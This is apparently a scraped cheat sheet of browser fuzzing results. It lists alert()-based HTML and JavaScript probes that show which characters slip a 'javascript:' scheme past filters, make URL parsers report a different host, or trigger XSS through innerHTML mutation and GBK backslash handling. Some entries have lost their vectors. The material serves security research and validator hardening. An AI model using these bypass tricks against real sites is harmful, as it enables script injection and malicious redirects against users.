Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
<div id="x9"><span x="href=0x09>&bbb"></span></div>0x0D
<script>0x0D
window["x9"].innerHTML=window["x9"].innerHTML;0x0D
if (window["x9"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(9)0x0D
}0x0D
</script><div id="x10"><span x="href=
>&bbb"></span></div>0x0D
<script>0x0D
window["x10"].innerHTML=window["x10"].innerHTML;0x0D
if (window["x10"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(10)0x0D
}0x0D
</script><div id="x12"><span x="href=0x0C>&bbb"></span></div>0x0D
<script>0x0D
window["x12"].innerHTML=window["x12"].innerHTML;0x0D
if (window["x12"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(12)0x0D
}0x0D
</script><div id="x13"><span x="href=0x0D>&bbb"></span></div>0x0D
<script>0x0D
window["x13"].innerHTML=window["x13"].innerHTML;0x0D
if (window["x13"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(13)0x0D
}0x0D
</script><div id="x32"><span x="href= >&bbb"></span></div>0x0D
<script>0x0D
window["x32"].innerHTML=window["x32"].innerHTML;0x0D
if (window["x32"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(32)0x0D
}0x0D
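</script>if (new URL("javascript0x09://xss.com").host=="xss.com"){alert(9)}
Tests which characters can follow "javascript" in the scheme while new URL() still returns xss.com as the host. For validation, compare the parsed url.protocol against an allow-list instead of matching the raw string.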
if (new URL("javascript+://xss.com").host=="xss.com"){alert(43)}
Tests which characters can follow "javascript" in the scheme while new URL() still returns xss.com as the host.
if (new URL("javascript-://xss.com").host=="xss.com"){alert(45)}
Tests which characters can follow "javascript" in the scheme while new URL() still returns xss.com as the host.
if (new URL("javascript.://xss.com").host=="xss.com"){alert(46)}
Tests which characters can follow "javascript" in the scheme while new URL() still returns xss.com as the host.
if (new URL("javascript0://xss.com").host=="xss.com"){alert(48)}
Tests which characters can follow "javascript" in the scheme while new URL() still returns xss.com as the host.
This vector shows what characters are allowed after a bigint
This vector shows what characters are allowed after a bigint
This vector shows what characters are allowed after a bigint
This vector shows what characters are allowed after a bigint
⟦09⟧x=123⟦09⟧0x0D
alert(9)This vector checks which characters are valid syntax before & after an assignment
x=123
0x0D
alert(10)This vector checks which characters are valid syntax before & after an assignment
0x0Bx=1230x0B0x0D
alert(11)This vector checks which characters are valid syntax before & after an assignment
0x0Cx=1230x0C0x0D
alert(12)This vector checks which characters are valid syntax before & after an assignment
0x0Dx=1230x0D0x0D
alert(13)This vector checks which characters are valid syntax before & after an assignment
This vector shows which characters are allowed after the throw statement.
This vector shows which characters are allowed after the throw statement.
This vector shows which characters are allowed after the throw statement.
const s = String.fromCodePoint(i);0x0D
if (!encodeURI(s).includes("%")) alert(i);0x0D
const s = String.fromCodePoint(i);0x0D
if (escape(s).includes("%")) alert(i);
List of all characters that, when passed through escape(), will be percent-encoded.
const s = String.fromCodePoint(i);0x0D
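if (encodeURI(s).includes("%")) alert(i);
List of all characters that, when passed through encodeURI(), will be percent-encoded. encodeURI() leaves URL delimiters such as / ? # & = unencoded, so it is not a substitute for encodeURIComponent() when encoding a single parameter value.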
const s = String.fromCodePoint(i);0x0D
if (encodeURIComponent(s).includes("%")) alert(i);
List of all characters that, when passed through encodeURIComponent(), will be percent-encoded.
try{0x0D
img = document.createElement("img");0x0D
img.src=`https://example.com:1@1`;0x0D
url = new URL(img.src);0x0D
if(url.hostname != "example.com"){0x0D
alert(64);0x0D
}0x0D
} catch{}
Injection into the PORT part of an img src URL: characters that change the parsed hostname.
if (new URL("https://google.com:10x090x09/endpoint").hostname!="google.com"){alert(9)}
Characters appended at the end of PORT within URL, which yield a different HOST. This is just a simple modification of another fuzzing vector by hansmachine.
if (new URL("https://google.com:1##/endpoint").hostname!="google.com"){alert(35)}
Characters appended at the end of PORT within URL, which yield a different HOST. This is just a simple modification of another fuzzing vector by hansmachine.
if (new URL("https://google.com:1///endpoint").hostname!="google.com"){alert(47)}
Characters appended at the end of PORT within URL, which yield a different HOST. This is just a simple modification of another fuzzing vector by hansmachine.
if (new URL("https://google.com:100/endpoint").hostname!="google.com"){alert(48)}
Characters appended at the end of PORT within URL, which yield a different HOST. This is just a simple modification of another fuzzing vector by hansmachine.
if (new URL("https://google.com:111/endpoint").hostname!="google.com"){alert(49)}
Characters appended at the end of PORT within URL, which yield a different HOST. This is just a simple modification of another fuzzing vector by hansmachine.
try{0x0D
document.createElement(String.fromCodePoint(58));0x0D
alert(58)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
try{0x0D
document.createElement(String.fromCodePoint(95));0x0D
alert(95)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
try{0x0D
document.createElement(String.fromCodePoint(170));0x0D
alert(170)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
try{0x0D
document.createElement(String.fromCodePoint(181));0x0D
alert(181)0x0D
} catch{}This shows which characters are allowed as a tag name with the document.createElement API.
<a href="https://0x09example2.com" id=x></a>
These vectors show which characters are ignored at the start of the hostname.
<a href="https://
example2.com" id=x></a>
These vectors show which characters are ignored at the start of the hostname.
<a href="https://0x0Dexample2.com" id=x></a>
These vectors show which characters are ignored at the start of the hostname.
<a href="https:///example2.com" id=x></a>
These vectors show which characters are ignored at the start of the hostname.
<a href="https://@example2.com" id=x></a>
These vectors show which characters are ignored at the start of the hostname.
<script>"\\"-alert(92)//"</script>This vector demonstrates that certain characters consume backslashes when using a GBK charset
if(new URL("https" + String.fromCharCode(i) + "//example.com").host == "example.com") alert(i)anchor.href="https://psres.net"+String.fromCodePoint(35)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(35)0x0D
}
This vector shows which characters, when placed before the @, make the link point to an external host instead of example.com.
anchor.href="https://psres.net"+String.fromCodePoint(47)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(47)0x0D
}
This vector shows which characters, when placed before the @, make the link point to an external host instead of example.com.
anchor.href="https://psres.net"+String.fromCodePoint(63)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(63)0x0D
}
This vector shows which characters, when placed before the @, make the link point to an external host instead of example.com.
anchor.href="https://psres.net"+String.fromCodePoint(92)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(92)0x0D
}
This vector shows which characters, when placed before the @, make the link point to an external host instead of example.com.
<a href="java0x09script:test.com/" id="test"></a>Characters that can be inside the javascript protocol in html
<a href="java
script:test.com/" id="test"></a><a href="java0x0Dscript:test.com/" id="test"></a>Characters that can be inside the javascript protocol in html
<a href="0x01javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x02javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x03javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x04javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
<a href="0x05javascript:test.com/" id="test"></a>Characters that can precede the javascript protocol in html
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.
JavaScript allows you to conditionally call a function using optional chaining.